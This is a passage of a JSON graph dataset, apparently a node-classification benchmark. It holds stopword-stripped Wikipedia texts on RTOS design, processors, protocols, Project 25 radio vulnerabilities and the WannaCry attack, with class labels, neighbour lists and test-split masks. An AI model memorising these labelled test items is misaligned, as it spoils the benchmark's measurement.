microseconds contrast 100 mhz arm cpu 2008 switches less 3 microseconds early oses tried minimize wasting cpu time avoiding unnecessary task switching typical designs task three states tasks blocked ready time generally one task run time per cpu number items ready queue vary greatly depending number tasks system needs perform type scheduler system uses simpler non-preemptive still multitasking systems task give time cpu tasks cause ready queue greater number overall tasks ready executed state resource starvation usually data structure ready list scheduler designed minimize worst-case length time spent scheduler critical section preemption inhibited cases interrupts disabled choice data structure depends also maximum number tasks ready list never tasks ready list doubly linked list ready tasks likely optimal ready list usually contains tasks occasionally contains list sorted priority way finding highest priority task run require iterating entire list inserting task requires walking ready list reaching either end list task lower priority task inserted care must taken inhibit preemption search longer critical sections divided small pieces interrupt occurs makes high priority task ready insertion low priority task high priority task inserted run immediately low priority task inserted critical response time sometimes called flyback time time takes queue new ready task restore state highest priority task running well-designed rtos readying new task take 3 20 instructions per ready-queue entry restoration highest-priority ready task take 5 30 instructions advanced systems real-time tasks share computing resources many non-real-time tasks ready list arbitrarily long systems scheduler ready list implemented linked list would inadequate commonly used rtos scheduling algorithms multitasking operating system like unix poor real-time tasks scheduler gives highest priority jobs lowest demand computer way ensure time-critical job access enough resources multitasking systems must manage sharing data hardware resources among multiple tasks usually unsafe two tasks access specific data hardware resource simultaneously three common approaches resolve problem general-purpose operating systems usually allow user programs mask disable interrupts user program could control cpu long wishes modern cpus allow user mode code disable interrupts control considered key operating system resource many embedded systems rtoss however allow application run kernel mode greater system call efficiency also permit application greater control operating environment without requiring os intervention single-processor systems application running kernel mode masking interrupts lowest overhead method prevent simultaneous access shared resource interrupts masked current task make blocking os call current task exclusive use cpu since task interrupt take control critical section protected task exits critical section must unmask interrupts pending interrupts execute temporarily masking interrupts done longest path critical section shorter desired maximum interrupt latency typically method protection used critical section instructions contains loops method ideal protecting hardware bit-mapped registers bits controlled different tasks shared resource must reserved without blocking tasks waiting flash memory written better use mechanisms also available general-purpose operating systems mutex os-supervised interprocess messaging mechanisms involve system calls usually invoke os dispatcher code exit typically take hundreds cpu instructions execute masking interrupts may take one instruction processors non-recursive mutex either locked unlocked task locked mutex tasks must wait mutex unlocked owner original thread task may set timeout wait mutex several well-known problems mutex based designs priority inversion deadlocks priority inversion high priority task waits low priority task mutex lower priority task given cpu time finish work typical solution task owns mutex 'inherit priority highest waiting task simple approach gets complex multiple levels waiting task waits mutex locked task b waits mutex locked task c handling multiple levels inheritance causes code run high priority context thus cause starvation medium-priority threads deadlock two tasks lock mutex without timeouts wait forever task mutex creating cyclic dependency simplest deadlock scenario occurs two tasks alternately lock two mutex opposite order deadlock prevented careful design approach resource sharing tasks send messages organized message passing scheme paradigm resource managed directly one task another task wants interrogate manipulate resource sends message managing task although real-time behavior less crisp semaphore systems simple message-based systems avoid protocol deadlock hazards generally better-behaved semaphore systems however problems like semaphores possible priority inversion occur task working low-priority message ignores higher-priority message message originating indirectly high priority task incoming message queue protocol deadlocks occur two tasks wait send response messages since interrupt handler blocks highest priority task running since real-time operating systems designed keep thread latency minimum interrupt handlers typically kept short possible interrupt handler defers interaction hardware possible typically necessary acknowledge disable interrupt wo n't occur interrupt handler returns notify task work needs done done unblocking driver task releasing semaphore setting flag sending message scheduler often provides ability unblock task interrupt handler context os maintains catalogues objects manages threads mutexes memory updates catalogue must strictly controlled reason problematic interrupt handler calls os function application act also os function called interrupt handler could find object database inconsistent state application update two major approaches deal problem unified architecture segmented architecture rtoss implementing unified architecture solve problem simply disabling interrupts internal catalogue updated downside interrupt latency increases potentially losing interrupts segmented architecture make direct os calls delegates os related work separate handler handler runs higher priority thread lower interrupt handlers advantage architecture adds cycles interrupt latency result oses implement segmented architecture predictable deal higher interrupt rates compared unified architecture similarly system management mode x86 compatible hardware take much time returns control operating system generally wrong write real-time software x86 hardware memory allocation critical real-time operating system operating systems first stability memory leaks memory allocated freed use device work indefinitely without ever needing reboot reason dynamic memory allocation frowned upon whenever possible required memory allocation specified statically compile time another reason avoid dynamic memory allocation memory fragmentation frequent allocation releasing small chunks memory situation may occur available memory divided several sections rtos incapable allocating large enough continuous block memory although enough free memory secondly speed allocation important standard memory allocation scheme scans linked list indeterminate length find suitable free memory block unacceptable rtos since memory allocation occur within certain amount time mechanical disks much longer unpredictable response times swapping disk files used reasons ram allocation discussed simple fixed-size-blocks algorithm works quite well simple embedded systems low overhead",
    "neighbors": [
      2560,
      7170,
      9218,
      516,
      5638,
      6155,
      8720,
      7187,
      10776,
      25,
      8732,
      4637,
      9759,
      9762,
      4643,
      6180,
      5671,
      2605,
      5680,
      7217,
      10803,
      3124,
      10809,
      1594,
      1083,
      11325,
      2623,
      576,
      2625,
      6207,
      3652,
      8262,
      6221,
      3160,
      2137,
      10333,
      7774,
      97,
      10851,
      5220,
      7269,
      1126,
      11363,
      6760,
      10856,
      9835,
      8301,
      6768,
      7285,
      4727,
      9335,
      11383,
      634,
      1147,
      3197,
      1150,
      5247,
      640,
      11390,
      2179,
      6276,
      7812,
      8326,
      10883,
      10891,
      6797,
      10382,
      2704,
      659,
      7319,
      6296,
      2201,
      154,
      9370,
      9882,
      9887,
      4773,
      7849,
      10921,
      9899,
      8879,
      178,
      9907,
      6837,
      1207,
      6329,
      8889,
      5823,
      10945,
      8388,
      1221,
      8902,
      7879,
      1736,
      2248,
      2761,
      9927,
      9928,
      8909,
      10443,
      5840,
      7377,
      9938,
      2259,
      7382,
      8410,
      731,
      9436,
      10971,
      1247,
      11489,
      1253,
      5355,
      7403,
      9964,
      1776,
      242,
      5363,
      2804,
      10482,
      9466,
      9468,
      1278,
      5378,
      1804,
      273,
      8977,
      787,
      276,
      789,
      5397,
      6933,
      7445,
      7446,
      10001,
      10007,
      2844,
      10016,
      292,
      8487,
      10235,
      2345,
      6442,
      3886,
      7983,
      10030,
      2355,
      6451,
      7477,
      823,
      1849,
      4409,
      6457,
      6459,
      7483,
      8508,
      7999,
      321,
      10561,
      11075,
      4423,
      6985,
      5452,
      6988,
      5457,
      7507,
      3412,
      341,
      7511,
      2908,
      4957,
      10590,
      10080,
      3426,
      4964,
      10085,
      8551,
      2412,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      8576,
      10113,
      4995,
      8069,
      394,
      3978,
      4492,
      9101,
      7057,
      5529,
      11675,
      9628,
      2462,
      5022,
      3488,
      9633,
      4515,
      421,
      1445,
      935,
      5029,
      4521,
      9643,
      428,
      2476,
      4525,
      11184,
      7601,
      10676,
      6078,
      9151,
      11203,
      6596,
      11204,
      11205,
      4040,
      8136,
      9162,
      1483,
      9166,
      9685,
      4569,
      477,
      6624,
      5603,
      8675,
      10730,
      10731,
      5103,
      6128,
      5105,
      8687,
      5619,
      3061,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 9367,
    "label": 5,
    "text": "Wireless_Datagram_Protocol:wireless datagram protocol wireless datagram protocol wdp defines movement information receiver sender resembles user datagram protocol internet protocol suite wireless datagram protocol wdp protocol wap architecture covers transport layer protocols internet model general transport service wdp offers upper layers invisible interface independent underlying network technology used consequence interface common transport protocols upper layer protocols wap architecture operate independently underlying wireless network letting transport layer deal physical network-dependent issues global interoperability acquired using mediating gateways",
    "neighbors": [
      1285,
      1160,
      5875,
      11413,
      5531
    ],
    "mask": "Test"
  },
  {
    "node_id": 9368,
    "label": 3,
    "text": "Tensilica:tensilica tensilica company based silicon valley semiconductor intellectual property core business part cadence design systems tensilica known customizable xtensa configurable processor microprocessor core products include hifi audio/voice dsps software library 225 codecs cadence 100 software partners vision dsps handle complex algorithms imaging video computer vision neural networks connx family baseband dsps ranging dual-mac connx d2 64-mac connx bbe64ep tensilica founded 1997 chris rowen one founders mips technologies employed earl killian contributed mips architecture director architecture march 11 2013 cadence design systems announced intent buy tensilica approximately 380 million cash cadence completed acquisition april 2013 cash outlay closing approximately 326 million cadence tensilica develops sip blocks included chip ic designs products licensees system chip embedded systems tensilica processors delivered synthesizable rtl easy integration chip designs xtensa processors range small low-power cache-less microcontroller high-performance 16-way simd processors 3-issue vliw dsp cores 1 tmac/sec neural network processors cadence standard dsps based xtensa architecture xtensa architecture offers user-customizable instruction set automated customization tools extend xtensa base instruction set including simd instructions new register files xtensa instruction set 32-bit architecture compact 16- 24-bit instruction set base instruction set 80 risc instructions includes 32-bit alu 64 general-purpose 32-bit registers six special-purpose registers amd trueaudio found e.g playstation 4 kaveri desktop apus amd graphics cards based cadence tensilica hifi ep audio dsp microsoft hololens uses special custom-designed tsmc-fabricated 28nm coprocessor 24 tensilica dsp cores around 65 million logic gates 8 mb sram additional layer 1 gb low-power ddr3 ram espressif esp8266 esp32 wi-fi iot socs spreadtrum licensed hifi dsp smartphones via technologies uses hifi dsp soc set top box tablets mobile devices realtek standardized hifi audio dsp mobile pc products brand name tensilica combination word tensile meaning capable extended word silica silicon element integrated circuits primarily made",
    "neighbors": [
      8481,
      6818,
      7234,
      3911,
      9911,
      9391,
      2224,
      4465,
      10675,
      6391,
      5464,
      11549,
      6207
    ],
    "mask": "None"
  },
  {
    "node_id": 9369,
    "label": 3,
    "text": "F16C:f16c f16c previously/informally known cvt16 instruction set x86 instruction set architecture extension provides support converting half-precision standard ieee single-precision floating-point formats cvt16 instruction set announced amd may 1 2009 extension 128-bit sse core instructions x86 amd64 instruction set cvt16 revision part sse5 instruction set proposal announced august 30 2007 supplemented xop fma4 instruction sets revision makes binary coding proposed new instructions compatible intel avx instruction extensions functionality instructions unchanged recent documents name f16c formally used intel amd x86-64 architecture specifications variants convert four floating-point values xmm register 8 floating-point values ymm register instructions abbreviations vector convert packed half packed single vice versa 8-bit immediate argument codice_5 selects rounding mode values 0–4 select nearest truncate mode set codice_6 support instructions indicated bit 29 ecx cpuid eax=1",
    "neighbors": [
      9092,
      2821,
      1798,
      4491,
      6924,
      4237,
      5645,
      7313,
      4886,
      6038,
      7963,
      9500,
      2719,
      2088,
      2094,
      9391,
      8120,
      8506,
      2237,
      1085,
      8125,
      8126,
      833,
      6978,
      7234,
      9541,
      3142,
      11080,
      2764,
      5326,
      977,
      2514,
      3537,
      2516,
      5844,
      9428,
      4603,
      7387,
      4444,
      8795,
      3294,
      2655,
      1122,
      7783,
      10985,
      5356,
      9964,
      5358,
      9582,
      8944,
      499,
      1399,
      9976,
      1915,
      10620
    ],
    "mask": "Test"
  },
  {
    "node_id": 9370,
    "label": 2,
    "text": "University_of_Michigan_Executive_System:university michigan executive system university michigan executive system umes batch operating system developed university michigan 1958 widely used many universities based general motors executive system ibm 701 umes revised work mainframe computers use university michigan time ibm 704 709 7090 work better small student jobs expected primary work load university umes use university michigan 1967 mts phased take advantage newer virtual memory time-sharing technology became available ibm system/360 model 67",
    "neighbors": [
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      10803,
      7733,
      9784,
      10809,
      573,
      576,
      8262,
      10333,
      97,
      9829,
      6248,
      8298,
      7285,
      9335,
      2168,
      1147,
      2172,
      3197,
      1150,
      2179,
      10883,
      6797,
      9361,
      9366,
      6296,
      7325,
      9887,
      7848,
      8879,
      3248,
      6837,
      1219,
      8388,
      6342,
      9932,
      5840,
      1235,
      7382,
      8410,
      1253,
      5363,
      2811,
      9468,
      2813,
      10499,
      1804,
      273,
      11539,
      789,
      5397,
      3359,
      10016,
      2345,
      1323,
      7983,
      7477,
      823,
      10040,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      7507,
      10590,
      863,
      868,
      3429,
      8551,
      5492,
      8063,
      4996,
      394,
      3978,
      7053,
      8077,
      7057,
      11667,
      11673,
      8092,
      6557,
      421,
      11184,
      5562,
      6075,
      6078,
      9151,
      8136,
      477,
      6128,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 9371,
    "label": 3,
    "text": "ARC_(processor):arc processor arc argonaut risc core embedded processors family 32-bit central processing units cpus originally designed arc international arc processors optimized wide range uses widely used system chip soc devices storage home mobile automotive internet things iot applications licensed 200 organizations shipped 1.5 billion products per year arc processors use reduced instruction set computing risc employ 16-/32-bit arcompact instruction set architecture isa provides good performance code density embedded host soc applications arc concept developed initially within argonaut games series 3d pipeline development projects starting super fx chip super nintendo entertainment system 1995 argonaut split argonaut technologies limited atl variety technology projects argonaut software limited asl start 1996 general manager argonaut john edelson started reducing atl projects brender motion capture investing development arc concept september 1996 rick clucas decided value arc processor people using rather argonaut projects using asked bob terwilliger join ceo rick clucas took role cto 1997 following investment apax partners atl became arc international totally independent argonaut games prior initial public offering london stock exchange underwritten goldman sachs five investment banks three related technology companies acquired metaware santa cruz california development modeling software vautomation nashua new hampshire peripheral semiconductor ip precise software nepean ontario rtos arc international acquired synopsys 2010 arc processors part synopsys designware series designers differentiate products using patented configuration technology tailor arc processor instance meet specific performance power area requirements configuration arc processors occurs design time using architect processor configurator core designed extensible allowing designers add custom instructions significantly increase performance reduce power consumption unlike embedded microprocessors extra instructions registers functionality added modular fashion customers analyse task break operations choose appropriate extensions develop create custom microprocessor might optimise speed energy efficiency code density extensions include example memory management unit mmu fast multiplier–accumulator usb host viterbi path decoder user proprietary rtl functions processors synthesizable implemented foundry process supported complete suite development tools",
    "neighbors": [
      5378,
      7170,
      8450,
      6925,
      1170,
      1298,
      7445,
      8861,
      3493,
      4773,
      6311,
      9638,
      682,
      4269,
      3886,
      9391,
      2224,
      4144,
      2226,
      3762,
      11314,
      1462,
      823,
      6716,
      8508,
      6207,
      10945,
      7234,
      7235,
      6084,
      11333,
      3014,
      3142,
      3911,
      9928,
      6607,
      2517,
      9685,
      3159,
      4569,
      4444,
      3807,
      11487,
      5861,
      10985,
      5355,
      9964,
      5358,
      11374,
      1776,
      8048,
      8944,
      757,
      11125,
      2039,
      249,
      3451,
      8700,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 9372,
    "label": 5,
    "text": "TCP_half-open:tcp half-open term half-open refers tcp connections whose state synchronization two communicating hosts possibly due crash one side connection process established also known embryonic connection lack synchronization could due malicious intent according rfc 793 tcp connection referred half-open host one end tcp connection crashed otherwise removed socket without notifying end remaining end idle connection may remain half-open state unbounded periods time nowadays however term half-open connection often used describe embryonic connection i.e tcp connection process established tcp three state system opening connection first originating endpoint sends syn packet destination b embryonic state specifically syn_sent awaiting response b updates kernel information indicate incoming connection sends request open channel back syn/ack packet point b also embryonic state specifically syn_rcvd note b put state another machine outside b control normal circumstances see denial-of-service attack deliberate failure cases receive syn/ack b update tables enough information send receive send final ack back b b receives final ack also sufficient information two-way communication connection fully open endpoints established state",
    "neighbors": [
      2409,
      2299,
      10924,
      6697
    ],
    "mask": "None"
  },
  {
    "node_id": 9373,
    "label": 4,
    "text": "Project_25:project 25 project 25 p25 apco-25 suite standards digital mobile radio communications designed use public safety organizations north america p25 radios direct replacement analog uhf example fm radios add ability transfer data well voice allowing natural implementation encryption messaging p25 radios commonly implemented dispatch organizations police fire ambulance emergency rescue service using vehicle-mounted radios combined walkie-talkie handheld use starting around 2012 products became available newer phase 2 modulation protocol older protocol known p25 became p25 phase 1 p25 phase 2 products use advanced ambe2+ vocoder allows audio pass compressed bitstream provides two tdma voice channels rf bandwidth 12.5 khz phase 1 provide one voice channel two protocols compatible however p25 phase 2 infrastructure provide dynamic transcoder feature translates phase 1 phase 2 needed addition phase 2 radios backwards compatible phase 1 modulation analog fm modulation per standard hand eu area created standard terrestrial trunked radio similar project 25 p25 fills similar role tetra dmr protocols public safety radios upgraded analog fm digital since 1990s increased use data radio systems features gps location trunking text messaging metering encryption various user protocols different public safety radio spectrum made difficult public safety agencies achieve interoperability widespread acceptance however lessons learned disasters united states faced past decades forced agencies assess requirements disaster basic infrastructure failed meet growing demands public safety digital radio communication united states federal communications commission fcc direction united states congress initiated 1988 inquiry recommendations users manufacturers improve existing communication systems based recommendations find solutions best serve needs public safety management october 1989 apco project 25 came existence coalition steering committee consisting representatives above-mentioned agencies along fpic department homeland security federal partnership interoperable communication coast guard department commerce national institute standards technology nist office law enforcement standards established decide priorities scope technical development p25 interoperable emergency communication integral initial response public health community safety national security economic stability problems experienced disaster events one serious poor communication due lack appropriate efficient means collect process transmit important information timely fashion cases radio communication systems incompatible inoperable within jurisdiction within departments agencies community non-operability occurs due use outdated equipment limited availability radio frequencies isolated independent planning lack coordination cooperation agencies community priorities competing resources funding ownership control communications systems recognizing understanding need project 25 p25 initiated collaboratively public safety agencies manufacturers address issue emergency communication systems p25 collaborative project ensure two-way radios interoperable goal p25 enable public safety responders communicate thus achieve enhanced coordination timely response efficient effective use communications equipment p25 established address need common digital public safety radio communications standards first-responders homeland security/emergency response professionals telecommunications industry association tr-8 engineering committee facilitates work role ansi-accredited standards development organization sdo published p25 suite standards tia-102 series documents include 49 separate parts land mobile radio tdma implementations technology public safety p25-compliant systems increasingly adopted deployed radios communicate analog mode legacy radios either digital analog mode p25 radios additionally deployment p25-compliant systems allow high degree equipment interoperability compatibility p25 standards use proprietary improved multi-band excitation imbe advanced multi-band excitation ambe+2 voice codecs designed digital voice systems inc. encode/decode analog audio signals rumored licensing cost voice-codecs used p25 standard devices main reason cost p25 compatible devices high p25 may used talk around mode without intervening equipment two radios conventional mode two radios communicate repeater base station without trunking trunked mode traffic automatically assigned one voice channels repeater base station protocol supports use data encryption standard des encryption 56 bit 2-key triple-des encryption three-key triple-des encryption advanced encryption standard aes encryption 256 bits keylength rc4 40 bits sold motorola advanced digital privacy encryption protocol also supports accordion 1.3 baton firefly mayfly saville type 1 ciphers p25 suite standards specify eight open interfaces various components land mobile radio system interfaces p25-compliant technology deployed two main phases future phases yet finalized phase 1 radio systems operate 12.5 khz digital mode using fdma access method phase 1 radios use continuous 4 level fm c4fm modulation—a special type 4fsk modulation—for digital transmissions 4,800 baud 2 bits per symbol yielding 9,600 bits per second total channel throughput 9,600 4,400 voice data generated imbe codec 2,800 forward error correction 2,400 signalling control functions receivers designed c4fm standard also demodulate compatible quadrature phase shift keying cqpsk standard parameters cqpsk signal chosen yield signal deviation symbol time c4fm phase 1 uses imbe voice codec systems involve standardized service facility specifications ensuring manufacturers compliant subscriber radio access services described specifications abilities include backward compatibility interoperability systems across system boundaries regardless system infrastructure addition p25 suite standards provides open interface radio frequency rf subsystem facilitate interlinking different vendors systems improve spectrum use p25 phase 2 developed trunking systems using 2-slot tdma scheme required new trunking systems 700 mhz band phase 2 uses ambe+2 voice codec reduce needed bitrate one voice channel require 6,000 bits per second including error correction signalling phase 2 backwards compatible phase 1 due tdma vs fdma operation although tdma radios systems capable operating phase 1 fdma required subscriber radio use tdma transmissions without time source therefore direct radio radio communications talkaround resorts fdma subscriber radios also resort narrow-band fm least common denominator almost two way radio could make analog narrow-band fm de facto interoperability mode time originally implementation phase 2 planned use 6.25 khz bandwidth per frequency allocation fdma however proved advantageous use existing 12.5 khz frequency allocations tdma mode number reasons first eliminated huge administrative process reallocating frequency assignments fcc existing phase 1 users second reduced amount base station transmitters one transmitter needed broadcast two voice slots third allowed subscriber radios save battery life transmitting half time also yields ability subscriber radio listen respond system requests transmissions phase 2 known 6.25 khz bandwidth equivalent satisfies fcc requirement voice transmissions occupy less bandwidth voice traffic phase 2 system transmits full 12.5 khz per frequency allocation phase 1 system however faster data rate 12 kbit/s allowing two simultaneous voice transmissions subscriber radios also transmit full 12.5 khz on/off repeating fashion resulting half transmission thus equivalent 6.25 khz per radio accomplished using ambe voice coder uses half rate phase 1 imbe voice coders 2000 2009 european telecommunications standards institute etsi tia working collaboratively public safety partnership project project mesa mobility emergency safety applications sought define unified set requirements next-generation aeronautical terrestrial digital wideband/broadband radio standard could used transmit receive voice video high-speed data wide-area multiple-agency networks deployed public safety agencies final functional technical requirements released etsi expected shape next phases american project 25 european dmr dpmr tetra interest industry followed since requirements could met available commercial off-the-shelf technology project closed 2010 united states 2008 wireless spectrum auction fcc allocated 20 mhz 700 mhz uhf radio band spectrum freed digital tv transition public safety networks fcc expects providers employ lte high-speed data video applications p25 systems resort using band signaling continuous tone-coded squelch system ctcss tone digital-coded squelch dcs codes access control instead use called network access code nac included outside digital voice frame 12 bit code prefixes every packet data sent including carrying voice transmissions nac feature similar ctcss dcs analog radios radios programmed pass audio receiving correct nac nacs programmed three-hexadecimal-digit code transmitted along digital signal transmitted since nac three-hexadecimal-digit number 12 bits 4,096 possible nacs programming far analog methods combined three possible nacs special functions adoption standards slowed budget problems us however funding communications upgrades department homeland security usually requires migrating project 25 also used countries worldwide including australia new zealand brazil canada india russia mid-2004 660 networks p25 deployed 54 countries time 2005 european terrestrial trunked radio tetra deployed sixty countries preferred choice europe china countries largely based tetra systems many times cheaper p25 systems 900 vs 6,000 radio time however p25 radio prices rapidly approaching parity tetra radio prices increased competition p25 market majority p25 networks based northern america advantage p25 system coverage frequency bandwidth earlier analog systems use channels easily upgraded one one p25 networks also allow intelligent migration analog radios digital radios operating within network p25 tetra offer varying degrees functionality depending available radio spectrum terrain project budget interoperability major goal p25 many p25 features present interoperability challenges theory p25 compliant equipment interoperable practice interoperable communications n't achievable without effective governance standardized operating procedures effective training exercises inter-jurisdictional coordination difficulties inherent developing p25 networks using features digital voice encryption trunking sometimes result feature-backlash organizational retreat minimal feature-free p25 implementations fulfill letter project 25 migration requirement without realizing benefits thereof additionally technical issue per se frictions often result unwieldy bureaucratic inter-agency processes tend develop order coordinate interoperability decisions securecomm 2011 conference london security researcher steve glass presented paper written co-author matt ames explained des-ofb motorola proprietary adp rc4 based ciphers vulnerable brute force key recovery research result op25 project uses gnu radio ettus universal software radio peripheral usrp implement open source p25 packet sniffer analyzer op25 project founded steve glass early 2008 performing research wireless networks part phd thesis paper available download nicta website 2011 wall street journal published article describing research security flaws system including user interface makes difficult users recognize transceivers operating secure mode according article r esearchers university pennsylvania overheard conversations included descriptions undercover agents confidential informants plans forthcoming arrests information technology used surveillance operations researchers found messages sent radios sent segments blocking portion segments result entire message jammed research also shows radios effectively jammed single radio short range using highly modified pink electronic child ’ toy standard used radios 'provides convenient means attacker continuously track location radio ’ user systems jammers expend lot power block communications p25 radios allow jamming relatively low power enabling researchers prevent reception using 30 toy pager designed pre-teens report presented 20th usenix security symposium san francisco august 2011 report noted number security flaws project 25 system specific way implemented inherent security design report find breaks p25 encryption however observed large amounts sensitive traffic sent clear due implementations problems found switch markings secure clear modes difficult distinguish ∅ vs. exacerbated fact p25 radios set secure mode continue operate without issuing warning another party switches clear mode addition report authors said many p25 systems change keys often increasing risk individual radio net may properly keyed forcing users net transmit clear maintain communications radio one design choice use lower levels error correction portions encoded voice data deemed less critical intelligibility result bit errors may expected typical transmissions harmless voice communication presence errors force use stream ciphers tolerate bit errors prevents use standard technique message authentication codes macs protect message integrity stream cipher attacks varying levels error correction implemented breaking p25 message frames subframes allows attacker jam entire messages transmitting certain short subframes critical reception entire frame result attacker effectively jam project 25 signals average power levels much lower power levels used communication attacks targeted encrypted transmissions forcing users transmit clear project 25 radios designed work existing two-way radio frequency channels use spread spectrum modulation inherently jam-resistant optimal spread spectrum system require effective jammer use 1,000 times much power 30 db individual communicators according report p25 jammer could effectively operate 1/25th power 14 db less communicating radios authors developed proof-of-concept jammer using texas instruments cc1110 single chip radio found inexpensive toy certain metadata fields project 25 protocol encrypted allowing attacker perform traffic analysis identify users project 25 radios respond bad data packets addressed retransmission request attacker deliberately send bad packets forcing specific radio transmit even user attempting maintain radio silence tracking authorized users considered feature p25 referred presence report authors concluded saying reasonable wonder protocol developed many years used sensitive critical applications difficult use vulnerable attack authors separately issued set recommendations p25 users mitigate problems found include disabling secure/clear switch using network access codes segregate clear encrypted traffic compensating unreliability p25 over-the-air rekeying extending key life p25 tetra used fifty-three countries worldwide public safety private sector radio networks differences features capacities",
    "neighbors": [
      2948,
      3140,
      262,
      7652,
      776,
      2920,
      7400,
      3115,
      3629,
      11181,
      7887,
      1501
    ],
    "mask": "Test"
  },
  {
    "node_id": 9374,
    "label": 3,
    "text": "Kernel_debugger:kernel debugger kernel debugger debugger present operating system kernels ease debugging kernel development kernel developers kernel debugger might stub implementing low-level operations full-blown debugger gdb running another machine sending commands stub serial line network connection might provide command line used directly machine debugged operating systems operating system kernels contain kernel debugger",
    "neighbors": [
      9218,
      9190,
      7561,
      8266,
      2255,
      6352,
      8976,
      1374
    ],
    "mask": "Test"
  },
  {
    "node_id": 9375,
    "label": 4,
    "text": "WannaCry_ransomware_attack:wannacry ransomware attack wannacry ransomware attack may 2017 worldwide cyberattack wannacry ransomware cryptoworm targeted computers running microsoft windows operating system encrypting data demanding ransom payments bitcoin cryptocurrency propagated eternalblue exploit developed united states national security agency nsa older windows systems eternalblue stolen leaked group called shadow brokers months prior attack microsoft released patches previously close exploit much wannacry spread organizations applied using older windows systems past end-of-life wannacry also took advantage installing backdoors onto infected systems attack stopped within days discovery due emergency patches released microsoft discovery kill switch prevented infected computers spreading wannacry attack estimated affected 200,000 computers across 150 countries total damages ranging hundreds millions billions dollars security experts believed preliminary evaluation worm attack originated north korea agencies working country december 2017 united states united kingdom australia formally asserted north korea behind attack new variant wannacry ransomware forced taiwan semiconductor manufacturing company tsmc temporarily shut several chip-fabrication factories august 2018 virus spread 10,000 machines tsmc advanced facilities wannacry ransomware cryptoworm targeted computers running microsoft windows operating system encrypting data demanding ransom payments bitcoin cryptocurrency worm also known wannacrypt wana decrypt0r 2.0 wanacrypt0r 2.0 wan na decryptor considered network worm also includes transport mechanism automatically spread transport code scans vulnerable systems uses eternalblue exploit gain access doublepulsar tool install execute copy wannacry versions 0 1 2 created using microsoft visual c++ 6.0 eternalblue exploit windows server message block smb protocol released shadow brokers much attention comment around event occasioned fact u.s. national security agency nsa exploit likely stolen already discovered vulnerability used create exploit offensive work rather report microsoft microsoft eventually discovered vulnerability tuesday 14 march 2017 issued security bulletin ms17-010 detailed flaw announced patches released windows versions currently supported time windows vista windows 7 windows 8.1 windows 10 windows server 2008 windows server 2008 r2 windows server 2012 windows server 2016 doublepulsar backdoor tool also released shadow brokers 14 april 2017 starting 21 april 2017 security researchers reported tens thousands computers doublepulsar backdoor installed 25 april reports estimated number infected computers could several hundred thousand numbers increasing every day wannacry code take advantage existing doublepulsar infection installs executed wannacry malware first checks kill switch domain name found ransomware encrypts computer data attempts exploit smb vulnerability spread random computers internet laterally computers network modern ransomware payload displays message informing user files encrypted demands payment around us 300 bitcoin within three days us 600 within seven days three hardcoded bitcoin addresses wallets used receive payments victims wallets transactions balances publicly accessible even though cryptocurrency wallet owners remain unknown several organizations released detailed technical writeups malware including microsoft cisco malwarebytes symantec mcafee attack began friday 12 may 2017 evidence pointing initial infection asia 07:44 utc initial infection likely exposed vulnerable smb port rather email phishing initially assumed within day code reported infected 230,000 computers 150 countries organizations installed microsoft security update april 2017 affected attack still running unsupported versions microsoft windows windows xp windows server 2003 particularly high risk security patches released since april 2014 exception one emergency patch released may 2014 kaspersky lab study reported however less 0.1 percent affected computers running windows xp 98 percent affected computers running windows 7 controlled testing environment cybersecurity firm kryptos logic found unable infect windows xp system wannacry using exploits payload failed load caused operating system crash rather actually execute encrypt files however executed manually wannacry could still operate windows xp experts quickly advised affected users paying ransom due reports people getting data back payment high revenues would encourage campaigns 14 june 2017 attack subsided total 327 payments totaling us 130,634.77 51.62396539 xbt transferred day initial attack may microsoft released out-of-band security updates end life products windows xp windows server 2003 windows 8 patches created february year following tip vulnerability january year organizations advised patch windows plug vulnerability order protect cyber attack head microsoft cyber defense operations center adrienne hall said “ due elevated risk destructive cyber-attacks time made decision take action applying updates provides protection potential attacks characteristics similar wannacrypt alternative name wannacry ” researcher marcus hutchins accidentally discovered kill switch domain hardcoded malware registering domain name dns sinkhole stopped attack spreading worm ransomware encrypted computer files unable connect domain computers infected wannacry website registration unable help already infected systems severely slowed spread initial infection gave time defensive measures deployed worldwide particularly north america asia attacked extent elsewhere 14 may first variant wannacry appeared new second kill-switch registered matt suiche day followed second variant third last kill-switch 15 may registered check point threat intelligence analysts days later new version wannacry detected lacked kill switch altogether 19 may reported hackers trying use mirai botnet variant effect distributed attack wannacry kill-switch domain intention knocking offline 22 may hutchins protected domain switching cached version site capable dealing much higher traffic loads live site separately researchers university college london boston university reported paybreak system could defeat wannacry several families ransomware recovering keys used encrypt user data discovered windows encryption apis used wannacry may completely clear prime numbers used generate payload private keys memory making potentially possible retrieve required key yet overwritten cleared resident memory key kept memory wannacry process killed computer rebooted infected behaviour used french researcher develop tool known wannakey automates process windows xp systems approach iterated upon second tool known wanakiwi tested work windows 7 server 2008 r2 well within four days initial outbreak new infections slowed trickle due responses linguistic analysis ransom notes indicated authors likely fluent chinese proficient english versions notes languages probably human-written rest seemed machine-translated according analysis fbi cyber behavioral analysis center computer created ransomware language files hangul language fonts installed evidenced presence \\fcharset129 rich text format tag metadata language files also indicated computers created ransomware set used korea google security researcher initially posted tweet referencing code similarities wannacry previous malware cybersecurity companies kaspersky lab symantec said code similarities previously used lazarus group believed carried cyberattack sony pictures 2014 bangladesh bank heist 2016—and linked north korea could also either simple re-use code another group attempt shift blame—as cyber false flag operation leaked internal nsa memo alleged also linked creation worm north korea brad smith president microsoft said believed north korea originator wannacry attack uk national cyber security centre reached conclusion 18 december 2017 united states government formally announced publicly considers north korea main culprit behind wannacry attack president trump homeland security advisor tom bossert wrote op-ed wall street journal charge saying make allegation lightly based evidence press conference following day bossert said evidence indicates kim jong-un given order launch malware attack bossert said canada new zealand japan agree united states assessment evidence links attack north korea united kingdom foreign commonwealth office says also stands behind united states assertion north korea however denied responsible cyberattack 6 september 2018 us department justice doj announced formal charges park jin-hyok involvement sony pictures hack 2014 doj contended park north korean hacker working part team experts north korean reconnaissance general bureau department justice asserted team also involved wannacry attack among activities ransomware campaign unprecedented scale according europol estimates around 200,000 computers infected across 150 countries according kaspersky lab four affected countries russia ukraine india taiwan one largest agencies struck attack national health service hospitals england scotland 70,000 devices – including computers mri scanners blood-storage refrigerators theatre equipment – may affected 12 may nhs services turn away 